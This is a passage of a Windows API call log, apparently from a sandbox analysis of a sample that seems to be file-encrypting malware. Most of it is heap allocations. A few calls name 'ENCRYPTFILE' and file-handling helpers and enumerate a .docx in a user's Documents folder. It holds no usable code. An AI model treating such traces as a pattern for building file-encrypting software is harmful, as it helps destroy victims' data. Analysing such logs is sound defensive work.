lpMsg=0x144f534) returned 0 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a75c0 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0077.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0077.999] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.000] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22e0 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.000] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0078.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42da7a0 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0078.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0078.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9920 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0078.001] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0078.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.001] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0078.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0078.001] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785f0860, ftCreationTime.dwHighDateTime=0x1d5d61c, ftLastAccessTime.dwLowDateTime=0x1fa74340, ftLastAccessTime.dwHighDateTime=0x1d5bf97, ftLastWriteTime.dwLowDateTime=0x1fa74340, ftLastWriteTime.dwHighDateTime=0x1d5bf97, nFileSizeHigh=0x0, nFileSizeLow=0xeafd, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="T- t3K 6dV0.docx", cAlternateFileName="T-T3K6~1.DOC")) returned 0x41abfc0 [0078.002] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.002] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22e0 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0078.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0078.003] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0078.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.003] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0078.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0078.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0078.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0078.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c50 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0078.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0078.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0078.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0078.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0078.005] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0078.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0078.008] RtlAllocateHeap 